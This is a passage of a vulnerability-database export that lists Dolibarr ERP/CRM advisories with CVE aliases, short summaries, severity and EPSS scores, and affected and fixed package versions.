| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 11 |
| vulnerability |
VCID-egxz-r3nw-xffm |
|
| 12 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 13 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 14 |
| vulnerability |
VCID-g3x8-rhqm-fuh2 |
|
| 15 |
| vulnerability |
VCID-hrwp-s15m-ffa1 |
|
| 16 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 17 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 18 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 19 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 20 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 21 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 22 |
| vulnerability |
VCID-rqux-jkta-4kfj |
|
| 23 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 24 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 25 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 26 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 27 |
| vulnerability |
VCID-v9g8-u2uq-7yff |
|
| 28 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 29 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 30 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
| 31 |
| vulnerability |
VCID-yn53-kazm-1ugc |
|
| 32 |
| vulnerability |
VCID-z1ty-xypd-t3ct |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@14.0.0 |
|
|
| aliases |
CVE-2021-25954, GHSA-vxhc-c4qm-647p
|
| risk_score |
3.1 |
| exploitability |
0.5 |
| weighted_severity |
6.2 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-651j-rw3n-kkgu |
|
| 13 |
| url |
VCID-6drz-jsq4-wyhd |
| vulnerability_id |
VCID-6drz-jsq4-wyhd |
| summary |
Dolibarr arbitrary file upload vulnerability
An arbitrary file upload vulnerability in the Upload Template function of Dolibarr ERP CRM up to v19.0.1 allows attackers to execute arbitrary code via uploading a crafted .SQL file. |
| references |
| 0 |
| reference_url |
http://dolibarr.com |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
8.8 |
| scoring_system |
cvssv3.1 |
| scoring_elements |
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
|
| 1 |
| value |
8.7 |
| scoring_system |
cvssv4 |
| scoring_elements |
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N |
|
| 2 |
| value |
HIGH |
| scoring_system |
generic_textual |
| scoring_elements |
|
|
| 3 |
| value |
Track |
| scoring_system |
ssvc |
| scoring_elements |
SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2024-06-20T15:21:39Z/ |
|
|
| url |
http://dolibarr.com |
|
| 1 |
|
| 2 |
| reference_url |
https://github.com/Dolibarr/dolibarr |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
8.8 |
| scoring_system |
cvssv3.1 |
| scoring_elements |
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
|
| 1 |
| value |
8.7 |
| scoring_system |
cvssv4 |
| scoring_elements |
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N |
|
| 2 |
| value |
HIGH |
| scoring_system |
generic_textual |
| scoring_elements |
|
|
|
| url |
https://github.com/Dolibarr/dolibarr |
|
| 3 |
|
| 4 |
|
| 5 |
|
|
| fixed_packages |
|
| aliases |
CVE-2024-37821, GHSA-p7r8-7w87-8g46
|
| risk_score |
4.0 |
| exploitability |
0.5 |
| weighted_severity |
8.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-6drz-jsq4-wyhd |
|
| 14 |
| url |
VCID-6nme-3afj-qfdp |
| vulnerability_id |
VCID-6nme-3afj-qfdp |
| summary |
Cross-site Scripting
In the editor module of Dolibarr, injected scripts are executed in a victim's browser when they open the page containing the vulnerable field. In the worst case, the victim who inadvertently triggers the attack is a highly privileged administrator. The injected scripts can extract the session ID, which can lead to full account takeover of the admin; due to another vulnerability (Improper Access Control on Private notes), a low-privileged user can update the private notes, which could lead to privilege escalation. |
| references |
| 0 |
| reference_url |
https://api.first.org/data/v1/epss?cve=CVE-2021-25955 |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
0.00415 |
| scoring_system |
epss |
| scoring_elements |
0.61992 |
| published_at |
2026-06-04T12:55:00Z |
|
| 1 |
| value |
0.00415 |
| scoring_system |
epss |
| scoring_elements |
0.62036 |
| published_at |
2026-06-07T12:55:00Z |
|
| 2 |
| value |
0.00415 |
| scoring_system |
epss |
| scoring_elements |
0.62047 |
| published_at |
2026-06-06T12:55:00Z |
|
| 3 |
| value |
0.00415 |
| scoring_system |
epss |
| scoring_elements |
0.6204 |
| published_at |
2026-06-05T12:55:00Z |
|
|
| url |
https://api.first.org/data/v1/epss?cve=CVE-2021-25955 |
|
| 1 |
|
| 2 |
|
| 3 |
|
| 4 |
|
| 5 |
|
|
| fixed_packages |
| 0 |
| url |
pkg:composer/dolibarr/dolibarr@13.0.3 |
| purl |
pkg:composer/dolibarr/dolibarr@13.0.3 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 1 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 2 |
| vulnerability |
VCID-3cg6-pnf4-jkc1 |
|
| 3 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 4 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 5 |
| vulnerability |
VCID-4j1s-mnar-1bef |
|
| 6 |
| vulnerability |
VCID-651j-rw3n-kkgu |
|
| 7 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 8 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 9 |
| vulnerability |
VCID-7qjh-teat-tqav |
|
| 10 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 11 |
| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 12 |
| vulnerability |
VCID-egxz-r3nw-xffm |
|
| 13 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 14 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 15 |
| vulnerability |
VCID-g3x8-rhqm-fuh2 |
|
| 16 |
| vulnerability |
VCID-hrwp-s15m-ffa1 |
|
| 17 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 18 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 19 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 20 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 21 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 22 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 23 |
| vulnerability |
VCID-rqux-jkta-4kfj |
|
| 24 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 25 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 26 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 27 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 28 |
| vulnerability |
VCID-v9g8-u2uq-7yff |
|
| 29 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 30 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 31 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
| 32 |
| vulnerability |
VCID-yn53-kazm-1ugc |
|
| 33 |
| vulnerability |
VCID-z1ty-xypd-t3ct |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@13.0.3 |
|
| 1 |
| url |
pkg:composer/dolibarr/dolibarr@14.0.0 |
| purl |
pkg:composer/dolibarr/dolibarr@14.0.0 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 1 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 2 |
| vulnerability |
VCID-3cg6-pnf4-jkc1 |
|
| 3 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 4 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 5 |
| vulnerability |
VCID-4j1s-mnar-1bef |
|
| 6 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 7 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 8 |
| vulnerability |
VCID-7qjh-teat-tqav |
|
| 9 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 10 |
| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 11 |
| vulnerability |
VCID-egxz-r3nw-xffm |
|
| 12 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 13 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 14 |
| vulnerability |
VCID-g3x8-rhqm-fuh2 |
|
| 15 |
| vulnerability |
VCID-hrwp-s15m-ffa1 |
|
| 16 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 17 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 18 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 19 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 20 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 21 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 22 |
| vulnerability |
VCID-rqux-jkta-4kfj |
|
| 23 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 24 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 25 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 26 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 27 |
| vulnerability |
VCID-v9g8-u2uq-7yff |
|
| 28 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 29 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 30 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
| 31 |
| vulnerability |
VCID-yn53-kazm-1ugc |
|
| 32 |
| vulnerability |
VCID-z1ty-xypd-t3ct |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@14.0.0 |
|
|
| aliases |
CVE-2021-25955, GHSA-cpv8-6xgr-rmf6
|
| risk_score |
4.5 |
| exploitability |
0.5 |
| weighted_severity |
9.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-6nme-3afj-qfdp |
|
| 15 |
| url |
VCID-6ten-mcds-gbd7 |
| vulnerability_id |
VCID-6ten-mcds-gbd7 |
| summary |
Cross-site Scripting
Dolibarr ERP/CRM allows XSS because uploaded HTML documents are served as text/html despite being renamed to `.noexe` files. |
| references |
| 0 |
| reference_url |
https://api.first.org/data/v1/epss?cve=CVE-2019-19210 |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
0.00606 |
| scoring_system |
epss |
| scoring_elements |
0.70039 |
| published_at |
2026-06-04T12:55:00Z |
|
| 1 |
| value |
0.00606 |
| scoring_system |
epss |
| scoring_elements |
0.70071 |
| published_at |
2026-06-07T12:55:00Z |
|
| 2 |
| value |
0.00606 |
| scoring_system |
epss |
| scoring_elements |
0.70088 |
| published_at |
2026-06-06T12:55:00Z |
|
| 3 |
| value |
0.00606 |
| scoring_system |
epss |
| scoring_elements |
0.7008 |
| published_at |
2026-06-05T12:55:00Z |
|
|
| url |
https://api.first.org/data/v1/epss?cve=CVE-2019-19210 |
|
| 1 |
|
| 2 |
|
| 3 |
|
| 4 |
|
|
| fixed_packages |
| 0 |
| url |
pkg:composer/dolibarr/dolibarr@10.0.3 |
| purl |
pkg:composer/dolibarr/dolibarr@10.0.3 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 1 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 2 |
| vulnerability |
VCID-3cg6-pnf4-jkc1 |
|
| 3 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 4 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 5 |
| vulnerability |
VCID-4j1s-mnar-1bef |
|
| 6 |
| vulnerability |
VCID-62rq-q7na-9kgj |
|
| 7 |
| vulnerability |
VCID-651j-rw3n-kkgu |
|
| 8 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 9 |
| vulnerability |
VCID-6nme-3afj-qfdp |
|
| 10 |
| vulnerability |
VCID-79xt-u5af-cqey |
|
| 11 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 12 |
| vulnerability |
VCID-7qjh-teat-tqav |
|
| 13 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 14 |
| vulnerability |
VCID-9fes-esxc-s7gw |
|
| 15 |
| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 16 |
| vulnerability |
VCID-dph7-h5d5-gyct |
|
| 17 |
| vulnerability |
VCID-e39t-gvd4-j7ag |
|
| 18 |
| vulnerability |
VCID-egxz-r3nw-xffm |
|
| 19 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 20 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 21 |
| vulnerability |
VCID-g3x8-rhqm-fuh2 |
|
| 22 |
| vulnerability |
VCID-hrwp-s15m-ffa1 |
|
| 23 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 24 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 25 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 26 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 27 |
| vulnerability |
VCID-m9p7-7wnz-7uck |
|
| 28 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 29 |
| vulnerability |
VCID-nnth-kevf-vybz |
|
| 30 |
| vulnerability |
VCID-pejz-pskb-aqbg |
|
| 31 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 32 |
| vulnerability |
VCID-rqux-jkta-4kfj |
|
| 33 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 34 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 35 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 36 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 37 |
| vulnerability |
VCID-v9g8-u2uq-7yff |
|
| 38 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 39 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 40 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
| 41 |
| vulnerability |
VCID-yn53-kazm-1ugc |
|
| 42 |
| vulnerability |
VCID-yumf-hmep-eqd6 |
|
| 43 |
| vulnerability |
VCID-yup5-ztvt-cfgp |
|
| 44 |
| vulnerability |
VCID-z1ty-xypd-t3ct |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@10.0.3 |
|
|
| aliases |
CVE-2019-19210, GHSA-87r3-4gc8-f897
|
| risk_score |
3.1 |
| exploitability |
0.5 |
| weighted_severity |
6.2 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-6ten-mcds-gbd7 |
|
| 16 |
| url |
VCID-79xt-u5af-cqey |
| vulnerability_id |
VCID-79xt-u5af-cqey |
| summary |
Incorrect Authorization
`core/get_menudiv.php` in Dolibarr allows remote authenticated attackers to bypass intended access restrictions via a non-alphanumeric menu parameter. |
| references |
| 0 |
| reference_url |
https://api.first.org/data/v1/epss?cve=CVE-2020-12669 |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
0.00289 |
| scoring_system |
epss |
| scoring_elements |
0.5257 |
| published_at |
2026-06-04T12:55:00Z |
|
| 1 |
| value |
0.00289 |
| scoring_system |
epss |
| scoring_elements |
0.52619 |
| published_at |
2026-06-07T12:55:00Z |
|
| 2 |
| value |
0.00289 |
| scoring_system |
epss |
| scoring_elements |
0.52637 |
| published_at |
2026-06-06T12:55:00Z |
|
| 3 |
| value |
0.00289 |
| scoring_system |
epss |
| scoring_elements |
0.5263 |
| published_at |
2026-06-05T12:55:00Z |
|
|
| url |
https://api.first.org/data/v1/epss?cve=CVE-2020-12669 |
|
| 1 |
|
| 2 |
|
| 3 |
|
| 4 |
|
|
| fixed_packages |
| 0 |
| url |
pkg:composer/dolibarr/dolibarr@11.0.4 |
| purl |
pkg:composer/dolibarr/dolibarr@11.0.4 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 1 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 2 |
| vulnerability |
VCID-1xw6-g5jg-9bhq |
|
| 3 |
| vulnerability |
VCID-2avs-48u9-5kgf |
|
| 4 |
| vulnerability |
VCID-3cg6-pnf4-jkc1 |
|
| 5 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 6 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 7 |
| vulnerability |
VCID-4j1s-mnar-1bef |
|
| 8 |
| vulnerability |
VCID-651j-rw3n-kkgu |
|
| 9 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 10 |
| vulnerability |
VCID-6nme-3afj-qfdp |
|
| 11 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 12 |
| vulnerability |
VCID-7qjh-teat-tqav |
|
| 13 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 14 |
| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 15 |
| vulnerability |
VCID-dph7-h5d5-gyct |
|
| 16 |
| vulnerability |
VCID-egxz-r3nw-xffm |
|
| 17 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 18 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 19 |
| vulnerability |
VCID-g3x8-rhqm-fuh2 |
|
| 20 |
| vulnerability |
VCID-hrwp-s15m-ffa1 |
|
| 21 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 22 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 23 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 24 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 25 |
| vulnerability |
VCID-m588-hqxv-tkgw |
|
| 26 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 27 |
| vulnerability |
VCID-nnth-kevf-vybz |
|
| 28 |
| vulnerability |
VCID-pejz-pskb-aqbg |
|
| 29 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 30 |
| vulnerability |
VCID-rqux-jkta-4kfj |
|
| 31 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 32 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 33 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 34 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 35 |
| vulnerability |
VCID-v9g8-u2uq-7yff |
|
| 36 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 37 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 38 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
| 39 |
| vulnerability |
VCID-yn53-kazm-1ugc |
|
| 40 |
| vulnerability |
VCID-yup5-ztvt-cfgp |
|
| 41 |
| vulnerability |
VCID-z1ty-xypd-t3ct |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@11.0.4 |
|
| 1 |
| url |
pkg:composer/dolibarr/dolibarr@12.0.0 |
| purl |
pkg:composer/dolibarr/dolibarr@12.0.0 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 1 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 2 |
| vulnerability |
VCID-3cg6-pnf4-jkc1 |
|
| 3 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 4 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 5 |
| vulnerability |
VCID-4j1s-mnar-1bef |
|
| 6 |
| vulnerability |
VCID-651j-rw3n-kkgu |
|
| 7 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 8 |
| vulnerability |
VCID-6nme-3afj-qfdp |
|
| 9 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 10 |
| vulnerability |
VCID-7qjh-teat-tqav |
|
| 11 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 12 |
| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 13 |
| vulnerability |
VCID-dph7-h5d5-gyct |
|
| 14 |
| vulnerability |
VCID-egxz-r3nw-xffm |
|
| 15 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 16 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 17 |
| vulnerability |
VCID-g3x8-rhqm-fuh2 |
|
| 18 |
| vulnerability |
VCID-hrwp-s15m-ffa1 |
|
| 19 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 20 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 21 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 22 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 23 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 24 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 25 |
| vulnerability |
VCID-rqux-jkta-4kfj |
|
| 26 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 27 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 28 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 29 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 30 |
| vulnerability |
VCID-v9g8-u2uq-7yff |
|
| 31 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 32 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 33 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
| 34 |
| vulnerability |
VCID-yn53-kazm-1ugc |
|
| 35 |
| vulnerability |
VCID-yup5-ztvt-cfgp |
|
| 36 |
| vulnerability |
VCID-z1ty-xypd-t3ct |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@12.0.0 |
|
|
| aliases |
CVE-2020-12669, GHSA-rg8m-84jf-9367
|
| risk_score |
4.0 |
| exploitability |
0.5 |
| weighted_severity |
8.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-79xt-u5af-cqey |
|
| 17 |
| url |
VCID-7ku4-fwqc-33ba |
| vulnerability_id |
VCID-7ku4-fwqc-33ba |
| summary |
Dolibarr vulnerable to RCE via the computed field parameter
Dolibarr ERP & CRM v21.0.1 was discovered to contain a remote code execution (RCE) vulnerability in the User module configuration via the computed field parameter. |
| references |
| 0 |
| reference_url |
http://dolibarr.com |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
8.8 |
| scoring_system |
cvssv3.1 |
| scoring_elements |
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H |
|
| 1 |
| value |
HIGH |
| scoring_system |
generic_textual |
| scoring_elements |
|
|
| 2 |
| value |
Track |
| scoring_system |
ssvc |
| scoring_elements |
SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-10-01T20:04:37Z/ |
|
|
| url |
http://dolibarr.com |
|
| 1 |
|
| 2 |
|
| 3 |
|
| 4 |
| reference_url |
https://github.com/PhDg1410/Research |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
8.8 |
| scoring_system |
cvssv3.1 |
| scoring_elements |
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H |
|
| 1 |
| value |
HIGH |
| scoring_system |
generic_textual |
| scoring_elements |
|
|
| 2 |
| value |
Track |
| scoring_system |
ssvc |
| scoring_elements |
SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-10-01T20:04:37Z/ |
|
|
| url |
https://github.com/PhDg1410/Research |
|
| 5 |
|
| 6 |
|
|
| fixed_packages |
|
| aliases |
CVE-2025-56588, GHSA-27hj-48r9-x2vx
|
| risk_score |
4.0 |
| exploitability |
0.5 |
| weighted_severity |
8.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-7ku4-fwqc-33ba |
|
| 18 |
| url |
VCID-7kz1-s7qf-aqan |
| vulnerability_id |
VCID-7kz1-s7qf-aqan |
| summary |
Dolibarr vulnerable to SQL Injection
Vulnerabilities in Dolibarr ERP - CRM that affect version 9.0.1 and allow SQL injection. These vulnerabilities could allow a remote attacker to send a specially crafted SQL query to the system and retrieve all the information stored in the database through the parameters `sortorder` and `sortfield` in /dolibarr/admin/dict.php. |
| references |
|
| fixed_packages |
| 0 |
| url |
pkg:composer/dolibarr/dolibarr@9.0.2 |
| purl |
pkg:composer/dolibarr/dolibarr@9.0.2 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 1 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 2 |
| vulnerability |
VCID-3cg6-pnf4-jkc1 |
|
| 3 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 4 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 5 |
| vulnerability |
VCID-4j1s-mnar-1bef |
|
| 6 |
| vulnerability |
VCID-62rq-q7na-9kgj |
|
| 7 |
| vulnerability |
VCID-651j-rw3n-kkgu |
|
| 8 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 9 |
| vulnerability |
VCID-6nme-3afj-qfdp |
|
| 10 |
| vulnerability |
VCID-6ten-mcds-gbd7 |
|
| 11 |
| vulnerability |
VCID-79xt-u5af-cqey |
|
| 12 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 13 |
| vulnerability |
VCID-7qjh-teat-tqav |
|
| 14 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 15 |
| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 16 |
| vulnerability |
VCID-dph7-h5d5-gyct |
|
| 17 |
| vulnerability |
VCID-e39t-gvd4-j7ag |
|
| 18 |
| vulnerability |
VCID-egxz-r3nw-xffm |
|
| 19 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 20 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 21 |
| vulnerability |
VCID-g3x8-rhqm-fuh2 |
|
| 22 |
| vulnerability |
VCID-hrwp-s15m-ffa1 |
|
| 23 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 24 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 25 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 26 |
| vulnerability |
VCID-jy5f-3h8w-qqff |
|
| 27 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 28 |
| vulnerability |
VCID-m9p7-7wnz-7uck |
|
| 29 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 30 |
| vulnerability |
VCID-nnth-kevf-vybz |
|
| 31 |
| vulnerability |
VCID-pejz-pskb-aqbg |
|
| 32 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 33 |
| vulnerability |
VCID-rqux-jkta-4kfj |
|
| 34 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 35 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 36 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 37 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 38 |
| vulnerability |
VCID-v9g8-u2uq-7yff |
|
| 39 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 40 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 41 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
| 42 |
| vulnerability |
VCID-yn53-kazm-1ugc |
|
| 43 |
| vulnerability |
VCID-yumf-hmep-eqd6 |
|
| 44 |
| vulnerability |
VCID-yup5-ztvt-cfgp |
|
| 45 |
| vulnerability |
VCID-z1ty-xypd-t3ct |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@9.0.2 |
|
|
| aliases |
CVE-2024-5314, GHSA-c3h9-q3jx-w7fc
|
| risk_score |
4.5 |
| exploitability |
0.5 |
| weighted_severity |
9.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-7kz1-s7qf-aqan |
|
| 19 |
| url |
VCID-7qjh-teat-tqav |
| vulnerability_id |
VCID-7qjh-teat-tqav |
| summary |
Code injection in dolibarr/dolibarr
Code Injection in GitHub repository dolibarr/dolibarr prior to 15.0.1. |
| references |
| 0 |
| reference_url |
https://api.first.org/data/v1/epss?cve=CVE-2022-0819 |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
0.01735 |
| scoring_system |
epss |
| scoring_elements |
0.82813 |
| published_at |
2026-06-04T12:55:00Z |
|
| 1 |
| value |
0.01735 |
| scoring_system |
epss |
| scoring_elements |
0.82835 |
| published_at |
2026-06-07T12:55:00Z |
|
| 2 |
| value |
0.01735 |
| scoring_system |
epss |
